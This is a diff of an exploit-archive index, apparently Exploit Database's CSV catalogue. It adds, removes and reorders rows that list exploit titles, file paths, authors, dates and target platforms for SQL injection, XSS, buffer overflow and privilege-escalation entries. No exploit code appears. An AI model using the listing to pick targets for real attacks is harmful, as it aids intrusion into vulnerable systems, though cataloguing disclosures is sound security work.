Exploit",2014-05-19,metacom,windows,remote,0 -33432,platforms/windows/remote/33432.html,"AoA DVD Creator 2.6.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 -33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 -33434,platforms/windows/webapps/33434.rb,"HP Release Control Authenticated XXE",2014-05-19,"Brandon Perry",windows,webapps,80 33435,platforms/php/webapps/33435.txt,"ClarkConnect Linux 5.0 - 'proxy.php' Cross-Site Scripting Vulnerability",2009-12-22,"Edgard Chammas",php,webapps,0 33436,platforms/php/webapps/33436.txt,"PHP-Calendar 1.1 update08.php configfile Parameter Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0 33437,platforms/php/webapps/33437.txt,"PHP-Calendar 1.1 update10.php configfile Parameter Traversal Local File Inclusion",2009-12-21,"Juan Galiana Lara",php,webapps,0 @@ -30158,8 +30178,6 @@ id,file,description,date,author,platform,type,port 33473,platforms/php/webapps/33473.txt,"RoundCube Webmail 0.2 - Cross-Site Scripting Vulnerability",2010-01-06,"j4ck and Globus",php,webapps,0 33474,platforms/php/webapps/33474.txt,"Joomla! DM Orders Component - 'id' Parameter SQL Injection Vulnerability",2010-01-07,NoGe,php,webapps,0 33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 - Multiple SQL Injection and HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0 -33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS <= 7.1.1 Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0 -33477,platforms/php/webapps/33477.txt,"Calendarix 0.7 - 'calpath' Parameter Remote File Include Vulnerability",2010-01-07,Saywhat,php,webapps,0 33478,platforms/php/webapps/33478.txt,"Joomla! Jobads 'type' Parameter SQL Injection Vulnerability",2010-01-08,N0KT4,php,webapps,0 33479,platforms/osx/dos/33479.c,"Mac OS X 10.x - 'libc/strtod(3)' Memory Corruption Vulnerability",2010-01-08,"Maksymilian Arciemowicz",osx,dos,0 33480,platforms/linux/dos/33480.txt,"MATLAB R2009b - 'dtoa' Implementation Memory Corruption Vulnerability",2010-01-08,"Maksymilian Arciemowicz",linux,dos,0 @@ -30175,7 +30193,10 @@ id,file,description,date,author,platform,type,port 33490,platforms/multiple/remote/33490.txt,"nginx 0.7.64 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 33493,platforms/multiple/webapps/33493.txt,"Multiple Stored XSS in Mayan-EDms web-based document management OS system",2014-05-24,"Dolev Farhi",multiple,webapps,0 33494,platforms/cgi/webapps/33494.txt,"Web Terra 1.1 - books.cgi Remote Command Execution",2014-05-24,"felipe andrian",cgi,webapps,0 -33495,platforms/windows/dos/33495.py,"Core FTP Server 1.2, build 535, 32-bit - Crash PoC",2014-05-24,"Kaczinski Ramirez",windows,dos,0 +33495,platforms/windows/dos/33495.py,"Core FTP Server 1.2_ build 535_ 32-bit - Crash PoC",2014-05-24,"Kaczinski Ramirez",windows,dos,0 +33581,platforms/linux/dos/33581.txt,"Hybserv2 - ':help' Command Denial Of Service Vulnerability",2010-01-29,"Julien Cristau",linux,dos,0 +33582,platforms/php/webapps/33582.txt,"Joomla! 'com_rsgallery2' 2.0 Component - 'catid' Parameter SQL Injection Vulnerability",2010-01-31,snakespc,php,webapps,0 +33583,platforms/hardware/dos/33583.pl,"Xerox WorkCentre PJL Daemon Buffer Overflow Vulnerability",2009-12-31,"Francis Provencher",hardware,dos,0 33497,platforms/multiple/remote/33497.txt,"AOLServer Terminal <= 4.5.1 Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 33498,platforms/multiple/remote/33498.txt,"Varnish 2.0.6 Terminal Escape Sequence in Logs Command Injection Vulnerability",2010-01-11,evilaliv3,multiple,remote,0 33499,platforms/multiple/remote/33499.txt,"thttpd <= 2.24 HTTP Request Escape Sequence Terminal Command Injection",2010-01-11,evilaliv3,multiple,remote,0 @@ -30192,10 +30213,18 @@ id,file,description,date,author,platform,type,port 33510,platforms/php/webapps/33510.txt,"Tribisur 'cat' Parameter Cross-Site Scripting Vulnerability",2010-01-13,"ViRuSMaN ",php,webapps,0 33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 - Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0 33514,platforms/php/webapps/33514.txt,"Videos Tube 1.0 - Multiple SQL Injection Vulnerabilities",2014-05-26,"Mustafa ALTINKAYNAK",php,webapps,80 +33646,platforms/php/webapps/33646.txt,"Joomla MS Comment Component 0.8.0b Security Bypass and Cross-Site Scripting Vulnerabilities",2009-12-31,"Jeff Channell",php,webapps,0 33516,platforms/linux/local/33516.txt,"Linux kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition (x64) Local Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0 33518,platforms/hardware/webapps/33518.txt,"Zyxel P-660HW-T1 3 Wireless Router - CSRF Vulnerability",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80 +33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' NULL Pointer Dereference Denial of Service Vulnerability",2008-07-31,"Rémi Denis-Courmont",linux,dos,0 33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80 33521,platforms/multiple/remote/33521.rb,"Symantec Workspace Streaming Arbitrary File Upload",2014-05-26,metasploit,multiple,remote,9855 +33611,platforms/windows/remote/33611.txt,"GeFest Web Home Server 1.0 - Remote Directory Traversal Vulnerability",2010-02-08,Markot,windows,remote,0 +33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow Vulnerability",2010-01-27,"Evgeny Legerov",unix,local,0 +33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 - 'tid' Parameter Cross-Site Scripting Vulnerability",2010-01-27,s4r4d0,php,webapps,0 +33575,platforms/cfm/webapps/33575.txt,"CommonSpot Server 'utilities/longproc.cfm' Cross-Site Scripting Vulnerability",2010-01-28,"Richard Brain",cfm,webapps,0 +33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Local Privilege Escalation Vulnerability",2010-01-28,"Matthew Garrett",linux,local,0 +33589,platforms/linux/local/33589.c,"Ubuntu 12.04.0-2LTS x64 - perf_swevent_init Kernel Local Root Exploit",2014-05-31,"Vitaly Nikolenko",linux,local,0 33523,platforms/linux/local/33523.c,"Linux Kernel 2.6.x - 'fasync_helper()' Local Privilege Escalation Vulnerability",2009-12-16,"Tavis Ormandy",linux,local,0 33524,platforms/linux/dos/33524.txt,"OpenOffice 3.1 - (.csv) Remote Denial of Service Vulnerability",2010-01-14,"Hellcode Research",linux,dos,0 33525,platforms/php/remote/33525.txt,"Zend Framework <= 1.9.6 - Multiple Input Validation Vulnerabilities and Security Bypass Weakness",2010-01-14,"draic Brady",php,remote,0 @@ -30211,6 +30240,12 @@ id,file,description,date,author,platform,type,port 33535,platforms/linux/remote/33535.txt,"SystemTap 1.0 - 'stat-server' Remote Arbitrary Command Injection Vulnerability",2010-01-15,"Frank Ch. Eigler",linux,remote,0 33536,platforms/multiple/remote/33536.txt,"Zenoss 2.3.3 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-01-18,"Adam Baldwin",multiple,remote,0 33538,platforms/windows/remote/33538.py,"Easy File Sharing FTP Server 3.5 - Stack Buffer Overflow",2014-05-27,superkojiman,windows,remote,21 +33636,platforms/php/webapps/33636.sh,"Interspire Knowledge Manager 5 - 'callback.snipshot.php' Arbitrary File Creation Vulnerability",2010-02-03,"Cory Marsh",php,webapps,0 +33637,platforms/php/webapps/33637.txt,"Webee Comments Component 1.1/1.2 for Joomla! index2.php articleId SQL Injection",2009-11-15,"Jeff Channell",php,webapps,0 +33638,platforms/php/webapps/33638.txt,"Webee Comments Component 1.1/1.2 for Joomla! Multiple BBCode Tags XSS",2009-11-15,"Jeff Channell",php,webapps,0 +33639,platforms/php/webapps/33639.txt,"Joomla! EasyBook 2.0.0rc4 Component Multiple HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0 +33640,platforms/windows/dos/33640.py,"AIMP <= 2.8.3 - (.m3u) Remote Stack Buffer Overflow Vulnerability",2010-02-12,Molotov,windows,dos,0 +33634,platforms/php/webapps/33634.txt,"CommodityRentals CD Rental Software 'index.php' SQL Injection Vulnerability",2010-02-11,"Don Tukulesto",php,webapps,0 33540,platforms/windows/remote/33540.txt,"SurgeFTP 2.x - 'surgeftpmgr.cgi' Multiple Cross-Site Scripting Vulnerabilities",2010-01-18,indoushka,windows,remote,0 33541,platforms/php/webapps/33541.txt,"DataLife Engine 8.3 engine/inc/include/init.php selected_language Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 33542,platforms/php/webapps/33542.txt,"DataLife Engine 8.3 engine/inc/help.php config[langs] Parameter Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 @@ -30243,28 +30278,10 @@ id,file,description,date,author,platform,type,port 33569,platforms/multiple/remote/33569.txt,"HP System Management Homepage <= 3.0.2 - 'servercert' Parameter Cross-Site Scripting Vulnerability",2010-01-27,"Richard Brain",multiple,remote,0 33570,platforms/multiple/remote/33570.txt,"SAP BusinessObjects 12 URI Redirection and Cross-Site Scripting Vulnerabilities",2010-01-27,"Richard Brain",multiple,remote,0 33571,platforms/linux/dos/33571.txt,"PostgreSQL 'bitsubstr' Buffer Overflow Vulnerability",2010-01-27,Intevydis,linux,dos,0 -33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow Vulnerability",2010-01-27,"Evgeny Legerov",unix,local,0 -33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 - 'tid' Parameter Cross-Site Scripting Vulnerability",2010-01-27,s4r4d0,php,webapps,0 -33575,platforms/cfm/webapps/33575.txt,"CommonSpot Server 'utilities/longproc.cfm' Cross-Site Scripting Vulnerability",2010-01-28,"Richard Brain",cfm,webapps,0 -33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Local Privilege Escalation Vulnerability",2010-01-28,"Matthew Garrett",linux,local,0 -33577,platforms/multiple/remote/33577.txt,"XAMPP 1.6.x - Multiple Cross-Site Scripting Vulnerabilities",2009-06-10,MustLive,multiple,remote,0 -33578,platforms/multiple/remote/33578.txt,"XAMPP 1.6.x - 'showcode.php' Local File Include Vulnerability",2009-07-16,MustLive,multiple,remote,0 -33579,platforms/multiple/dos/33579.txt,"Ingres Database 9.3 Heap Buffer Overflow Vulnerability",2010-01-29,"Evgeny Legerov",multiple,dos,0 -33580,platforms/hardware/remote/33580.txt,"Comtrend CT-507 IT ADSL Router 'scvrtsrv.cmd' Cross-Site Scripting Vulnerability",2010-01-29,Yoyahack,hardware,remote,0 -33581,platforms/linux/dos/33581.txt,"Hybserv2 - ':help' Command Denial Of Service Vulnerability",2010-01-29,"Julien Cristau",linux,dos,0 -33582,platforms/php/webapps/33582.txt,"Joomla! 'com_rsgallery2' 2.0 Component - 'catid' Parameter SQL Injection Vulnerability",2010-01-31,snakespc,php,webapps,0 -33583,platforms/hardware/dos/33583.pl,"Xerox WorkCentre PJL Daemon Buffer Overflow Vulnerability",2009-12-31,"Francis Provencher",hardware,dos,0 -33584,platforms/multiple/dos/33584.txt,"IBM DB2 - 'kuddb2' Remote Denial of Service Vulnerability",2010-01-31,"Evgeny Legerov",multiple,dos,0 33585,platforms/linux/dos/33585.txt,"Linux Kernel 2.6.x - (64 bit) Personality Handling Local Denial of Service Vulnerability",2010-02-01,"Mathias Krause",linux,dos,0 33586,platforms/php/webapps/33586.txt,"Joomla! 'com_gambling' Component - 'gamblingEvent' Parameter SQL Injection Vulnerability",2010-02-01,md.r00t,php,webapps,0 33587,platforms/windows/dos/33587.html,"Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero",2014-05-30,"Pawel Wylecial",windows,dos,0 33588,platforms/java/remote/33588.rb,"ElasticSearch Dynamic Script Arbitrary Java Execution",2014-05-30,metasploit,java,remote,9200 -33589,platforms/linux/local/33589.c,"Ubuntu 12.04.0-2LTS x64 - perf_swevent_init Kernel Local Root Exploit",2014-05-31,"Vitaly Nikolenko",linux,local,0 -33590,platforms/php/webapps/33590.txt,"Joomla! AutartiTarot Component Directory Traversal Vulnerability",2010-02-01,B-HUNT3|2,php,webapps,0 -33591,platforms/linux/dos/33591.sh,"lighttpd 1.4/1.5 Slow Request Handling Remote Denial Of Service Vulnerability",2010-02-02,"Li Ming",linux,dos,0 -33592,platforms/linux/dos/33592.txt,"Linux Kernel 2.6.x - KVM 'pit_ioport_read()' Local Denial of Service Vulnerability",2010-02-02,"Marcelo Tosatti",linux,dos,0 -33593,platforms/windows/local/33593.c,"Microsoft Windows XP/VISTA/2000/2003 Double Free Memory Corruption Local Privilege Escalation Vulnerability",2010-02-09,"Tavis Ormandy",windows,local,0 -33594,platforms/windows/remote/33594.txt,"Microsoft Windows VISTA/2008 ICMPv6 Router Advertisement Remote Code Execution Vulnerability",2010-02-09,"Sumit Gwalani",windows,remote,0 33595,platforms/php/webapps/33595.txt,"Interspire Knowledge Manager < 5.1.3 - Multiple Remote Vulnerabilities",2010-02-04,"Cory Marsh",php,webapps,0 33596,platforms/jsp/webapps/33596.txt,"KnowGate hipergate 4.0.12 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-04,"Nahuel Grisolia",jsp,webapps,0 33597,platforms/php/webapps/33597.txt,"Data 1 Systems UltraBB 1.17 - 'view_post.php' Cross-Site Scripting Vulnerability",2010-02-04,s4r4d0,php,webapps,0 @@ -30280,7 +30297,6 @@ id,file,description,date,author,platform,type,port 33607,platforms/multiple/dos/33607.html,"Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial Of Service Vulnerability",2010-02-07,"599eme Man",multiple,dos,0 33608,platforms/windows/dos/33608.html,"Apple Safari 4.0.4 - Remote Denial Of Service Vulnerability",2010-02-07,"599eme Man",windows,dos,0 33610,platforms/windows/remote/33610.py,"Easy File Management Web Server 5.3 - UserID Remote Buffer Overflow (ROP)",2014-06-01,"Julien Ahrens",windows,remote,80 -33611,platforms/windows/remote/33611.txt,"GeFest Web Home Server 1.0 - Remote Directory Traversal Vulnerability",2010-02-08,Markot,windows,remote,0 33613,platforms/php/webapps/33613.txt,"Wordpress Participants Database 1.5.4.8 - SQL Injection",2014-06-02,"Yarubo Research Team",php,webapps,80 33614,platforms/linux/local/33614.c,"dbus-glib pam_fprintd - Local Root Exploit",2014-06-02,"Sebastian Krahmer",linux,local,0 33615,platforms/multiple/remote/33615.txt,"JDownloader 'JDExternInterface.java' Remote Code Execution Vulnerability",2010-02-08,apoc,multiple,remote,0 @@ -30302,19 +30318,10 @@ id,file,description,date,author,platform,type,port 33631,platforms/ios/webapps/33631.txt,"AllReader 1.0 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,ios,webapps,8080 33632,platforms/ios/webapps/33632.txt,"Bluetooth Photo-File Share 2.1 iOS - Multiple Vulnerabilities",2014-06-03,Vulnerability-Lab,ios,webapps,8080 33633,platforms/windows/webapps/33633.txt,"IPSwitch IMail Server WEB client 12.4 persistent XSS",2014-06-03,Peru,windows,webapps,0 -33634,platforms/php/webapps/33634.txt,"CommodityRentals CD Rental Software 'index.php' SQL Injection Vulnerability",2010-02-11,"Don Tukulesto",php,webapps,0 -33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' NULL Pointer Dereference Denial of Service Vulnerability",2008-07-31,"Rmi Denis-Courmont",linux,dos,0 -33636,platforms/php/webapps/33636.sh,"Interspire Knowledge Manager 5 - 'callback.snipshot.php' Arbitrary File Creation Vulnerability",2010-02-03,"Cory Marsh",php,webapps,0 -33637,platforms/php/webapps/33637.txt,"Webee Comments Component 1.1/1.2 for Joomla! index2.php articleId SQL Injection",2009-11-15,"Jeff Channell",php,webapps,0 -33638,platforms/php/webapps/33638.txt,"Webee Comments Component 1.1/1.2 for Joomla! Multiple BBCode Tags XSS",2009-11-15,"Jeff Channell",php,webapps,0 -33639,platforms/php/webapps/33639.txt,"Joomla! EasyBook 2.0.0rc4 Component Multiple HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0 -33640,platforms/windows/dos/33640.py,"AIMP <= 2.8.3 - (.m3u) Remote Stack Buffer Overflow Vulnerability",2010-02-12,Molotov,windows,dos,0 +33644,platforms/php/webapps/33644.txt,"Basic-CMS 'nav_id' Parameter Cross-Site Scripting Vulnerability",2010-02-12,Red-D3v1L,php,webapps,0 33641,platforms/php/webapps/33641.txt,"Joomla! F!BB Component 1.5.96 RC SQL Injection and HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0 33642,platforms/windows/remote/33642.html,"Symantec Multiple Products Client Proxy ActiveX (CLIproxy.dll) Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0 33643,platforms/php/webapps/33643.txt,"CMS Made Simple 1.6.6 - Local File Include and Cross-Site Scripting Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0 -33644,platforms/php/webapps/33644.txt,"Basic-CMS 'nav_id' Parameter Cross-Site Scripting Vulnerability",2010-02-12,Red-D3v1L,php,webapps,0 -33645,platforms/windows/remote/33645.py,"httpdx 1.5 - 'MKD' Command Directory Traversal Vulnerability",2010-02-15,fb1h2s,windows,remote,0 -33646,platforms/php/webapps/33646.txt,"Joomla MS Comment Component 0.8.0b Security Bypass and Cross-Site Scripting Vulnerabilities",2009-12-31,"Jeff Channell",php,webapps,0 33647,platforms/asp/webapps/33647.txt,"Portrait Software Portrait Campaign Manager 4.6.1.22 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-16,"Roel Schouten",asp,webapps,0 33648,platforms/hardware/remote/33648.txt,"Huawei HG510 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-16,"Ivan Markovic",hardware,remote,0 33649,platforms/php/webapps/33649.txt,"BGSvetionik BGS CMS 'search' Parameter Cross-Site Scripting Vulnerability",2010-02-16,hacker@sr.gov.yu,php,webapps,0 @@ -30334,14 +30341,14 @@ id,file,description,date,author,platform,type,port 33663,platforms/multiple/remote/33663.txt,"IBM WebSphere Portal 6.0.1.5 Build wp6015 Portlet Palette Search HTML Injection Vulnerability",2010-02-19,"Sjoerd Resink",multiple,remote,0 33664,platforms/multiple/remote/33664.html,"Mozilla Firefox <= 3.5.8 Style Sheet Redirection Information Disclosure Vulnerability",2010-01-09,"Cesar Cerrudo",multiple,remote,0 33665,platforms/php/webapps/33665.txt,"Softbiz Jobs 'sbad_type' Parameter Cross-Site Scripting Vulnerability",2010-02-23,"pratul agrawal",php,webapps,0 -33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0 -33672,platforms/linux/dos/33672.txt,"Kojoney 0.0.4.1 - 'urllib.urlopen()' Remote Denial of Service Vulnerability",2010-02-24,Nicob,linux,dos,0 -33673,platforms/php/webapps/33673.pl,"HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability",2010-02-24,kaMtiEz,php,webapps,0 -33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 - Multiple Local File Include Vulnerabilities",2010-02-24,JIKO,php,webapps,0 +33713,platforms/windows/dos/33713.py,"Core FTP LE 2.2 - Heap Overflow PoC",2014-06-11,"Gabor Seljan",windows,dos,0 33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products Login Page Cross-Site Scripting Vulnerability",2010-02-25,"Oren Hafif",jsp,webapps,0 33676,platforms/php/webapps/33676.txt,"Newbie CMS 0.0.2 Insecure Cookie Authentication Bypass Vulnerability",2010-02-25,JIKO,php,webapps,0 33677,platforms/php/dos/33677.txt,"PHP <= 5.3.1 - LCG Entropy Security Vulnerability",2010-02-26,Rasmus,php,dos,0 33678,platforms/jsp/webapps/33678.txt,"ARISg 5.0 - 'wflogin.jsp' Cross-Site Scripting Vulnerability",2010-02-26,"Yaniv Miron",jsp,webapps,0 +33672,platforms/linux/dos/33672.txt,"Kojoney 0.0.4.1 - 'urllib.urlopen()' Remote Denial of Service Vulnerability",2010-02-24,Nicob,linux,dos,0 +33673,platforms/php/webapps/33673.pl,"HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability",2010-02-24,kaMtiEz,php,webapps,0 +33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 - Multiple Local File Include Vulnerabilities",2010-02-24,JIKO,php,webapps,0 33679,platforms/php/webapps/33679.txt,"TRUC 0.11 - 'login_reset_password_page.php' Cross-Site Scripting Vulnerability",2010-02-28,snakespc,php,webapps,0 33680,platforms/php/webapps/33680.txt,"Open Educational System 0.1 beta - 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Include Vulnerabilities",2010-02-28,"cr4wl3r ",php,webapps,0 33681,platforms/php/webapps/33681.txt,"SLAED CMS 4 Installation Script Unauthorized Access Vulnerability",2010-02-27,indoushka,php,webapps,0 @@ -30355,31 +30362,29 @@ id,file,description,date,author,platform,type,port 33689,platforms/multiple/remote/33689.as,"Adobe Flash Player <= 10.1.51 - Local File Access Information Disclosure Vulnerability",2010-03-03,"lis cker",multiple,remote,0 33690,platforms/php/webapps/33690.txt,"DosyaYukle Scripti 1.0 - Remote File Upload Vulnerability",2010-03-03,indoushka,php,webapps,0 33691,platforms/jsp/webapps/33691.txt,"Comptel Provisioning and Activation 'error_msg_parameter' Cross-Site Scripting Vulnerability",2010-03-04,thebluegenius,jsp,webapps,0 +33707,platforms/windows/remote/33707.txt,"Orb Networks <= 2.54.18 - Orb Direct Show Filter MP3 File Divide-By-Zero Denial of Service Vulnerability",2010-03-04,"Matthew Bergin",windows,remote,0 +33708,platforms/bsd/dos/33708.c,"FreeBSD <= 8.0 and OpenBSD 4.x - 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability",2010-03-05,kingcope,bsd,dos,0 +33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0 +33706,platforms/php/webapps/33706.txt,"Drupal < 6.16 and 5.22 - Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0 +33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 - 'ShowPost.asp' Cross-Site Scripting Vulnerability",2010-03-04,Liscker,asp,webapps,0 33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 (surname param) - Persistent XSS Vulnerability",2014-06-09,"shyamkumar somana",php,webapps,80 33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80 33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 < 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80 -33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php, article_id param) SQL Injection Vulnerability",2014-06-10,LiquidWorm,php,webapps,80 -33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 - 'ShowPost.asp' Cross-Site Scripting Vulnerability",2010-03-04,Liscker,asp,webapps,0 -33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0 -33706,platforms/php/webapps/33706.txt,"Drupal < 6.16 and 5.22 - Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0 -33707,platforms/windows/remote/33707.txt,"Orb Networks <= 2.54.18 - Orb Direct Show Filter MP3 File Divide-By-Zero Denial of Service Vulnerability",2010-03-04,"Matthew Bergin",windows,remote,0 -33708,platforms/bsd/dos/33708.c,"FreeBSD <= 8.0 and OpenBSD 4.x - 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability",2010-03-05,kingcope,bsd,dos,0 -33709,platforms/php/webapps/33709.txt,"Natychmiast CMS - Multiple Cross-Site Scripting and SQL Injection Vulnerabilities",2010-03-05,"Maciej Gojny",php,webapps,0 -33710,platforms/windows/dos/33710.txt,"J. River Media Jukebox 12 - (.mp3) Remote Heap Buffer Overflow Vulnerability",2010-03-04,"Gjoko Krstic",windows,dos,0 -33711,platforms/windows/dos/33711.txt,"BS.Player 2.51 - (.mp3) Buffer Overflow Vulnerability",2010-03-05,"Gjoko Krstic",windows,dos,0 -33712,platforms/windows/remote/33712.txt,"VLC Media Player 1.0.x - Bookmark Creation Buffer Overflow Vulnerability",2010-03-05,"Gjoko Krstic",windows,remote,0 -33713,platforms/windows/dos/33713.py,"Core FTP LE 2.2 - Heap Overflow PoC",2014-06-11,"Gabor Seljan",windows,dos,0 +33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php article_id param) SQL Injection Vulnerability",2014-06-10,LiquidWorm,php,webapps,80 33714,platforms/php/webapps/33714.txt,"SHOUTcast DNAS 2.2.1 - Stored XSS",2014-06-11,rob222,php,webapps,0 33715,platforms/asp/webapps/33715.txt,"Spectrum Software WebManager CMS 'pojam' Parameter Cross-Site Scripting Vulnerability",2010-03-05,hacker@sr.gov.yu,asp,webapps,0 33716,platforms/php/webapps/33716.txt,"Saskia's Shopsystem 'id' Parameter Local File Include Vulnerability",2010-03-05,"cr4wl3r ",php,webapps,0 33717,platforms/multiple/webapps/33717.txt,"Six Apart Vox - 'search' Page Cross-Site Scripting Vulnerability",2010-03-05,Phenom,multiple,webapps,0 +33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 - Remote Buffer Overflow Vulnerability",2010-04-15,mr_me,windows,dos,0 +33711,platforms/windows/dos/33711.txt,"BS.Player 2.51 - (.mp3) Buffer Overflow Vulnerability",2010-03-05,"Gjoko Krstic",windows,dos,0 +33712,platforms/windows/remote/33712.txt,"VLC Media Player 1.0.x - Bookmark Creation Buffer Overflow Vulnerability",2010-03-05,"Gjoko Krstic",windows,remote,0 33718,platforms/php/webapps/33718.txt,"phpCOIN 1.2.1 - 'mod' Parameter Local File Include Vulnerability",2010-03-06,_mlk_,php,webapps,0 33719,platforms/windows/dos/33719.py,"Microsoft Windows XP/Vista - (.ani) 'tagBITMAPINFOHEADER' Denial of Service Vulnerability",2010-03-08,Skylined,windows,dos,0 33720,platforms/asp/webapps/33720.txt,"Pre E-Learning Portal 'search_result.asp' SQL Injection Vulnerability",2010-03-08,NoGe,asp,webapps,0 33721,platforms/asp/webapps/33721.txt,"Max Network Technology BBSMAX <= 4.2 - 'post.aspx' Cross-Site Scripting Vulnerability",2010-03-08,Liscker,asp,webapps,0 33722,platforms/asp/webapps/33722.txt,"ASPCode CMS 1.5.8 - 'default.asp' Multiple Cross-Site Scripting Vulnerabilities",2010-03-08,"Alberto Fontanella",asp,webapps,0 33723,platforms/php/webapps/33723.html,"KDPics 1.18 - 'admin/index.php' Authentication Bypass Vulnerability",2010-03-08,snakespc,php,webapps,0 -33724,platforms/php/webapps/33724.txt,"OpenCart 1.3.2 - 'page' Parameter SQL Injection Vulnerability",2010-03-07,"Andrs Gmez",php,webapps,0 +33724,platforms/php/webapps/33724.txt,"OpenCart 1.3.2 - 'page' Parameter SQL Injection Vulnerability",2010-03-07,"Andrés Gómez",php,webapps,0 33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 libodm - Arbitrary File Write",2014-06-12,Portcullis,aix,local,0 33726,platforms/php/webapps/33726.txt,"TikiWik < 4.2 - Multiple Vulnerabilities",2010-03-09,"Mateusz Drygas",php,webapps,0 33727,platforms/php/webapps/33727.txt,"wh-em.com upload 7.0 Insecure Cookie Authentication Bypass Vulnerability",2010-02-16,indoushka,php,webapps,0 @@ -30393,11 +30398,14 @@ id,file,description,date,author,platform,type,port 33735,platforms/multiple/dos/33735.txt,"SUPERAntiSpyware 4.34.1000 and SuperAdBlocker 4.6.1000 - Multiple Vulnerabilities",2010-03-10,"Luka Milkovic",multiple,dos,0 33736,platforms/aix/webapps/33736.php,"Plesk 10.4.4/11.0.9 - SSO XXE/XSS Injection Exploit",2014-06-13,"BLacK ZeRo",aix,webapps,0 33737,platforms/hardware/remote/33737.py,"ZTE and TP-Link RomPager - DoS Exploit",2014-06-13,"Osanda Malith",hardware,remote,0 +33760,platforms/multiple/webapps/33760.txt,"Multiple Products 'banner.swf' Cross-Site Scripting Vulnerability",2010-03-15,MustLive,multiple,webapps,0 +33761,platforms/asp/webapps/33761.txt,"Pars CMS 'RP' Parameter Multiple SQL Injection Vulnerabilities",2010-03-15,Isfahan,asp,webapps,0 33739,platforms/hardware/remote/33739.txt,"Yealink VoIP Phone SIP-T38G - Default Credentials",2014-06-13,Mr.Un1k0d3r,hardware,remote,0 33740,platforms/hardware/remote/33740.txt,"Yealink VoIP Phone SIP-T38G - Local File Inclusion",2014-06-13,Mr.Un1k0d3r,hardware,remote,0 33741,platforms/hardware/remote/33741.txt,"Yealink VoIP Phone SIP-T38G - Remote Command Execution",2014-06-13,Mr.Un1k0d3r,hardware,remote,0 33742,platforms/hardware/remote/33742.txt,"Yealink VoIP Phone SIP-T38G - Privileges Escalation",2014-06-13,Mr.Un1k0d3r,hardware,remote,0 -33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 - zero_transact_user.php, Handling Privilege Escalation",2014-06-13,"Tiago Carvalho",php,webapps,0 +33743,platforms/php/webapps/33743.py,"ZeroCMS 1.0 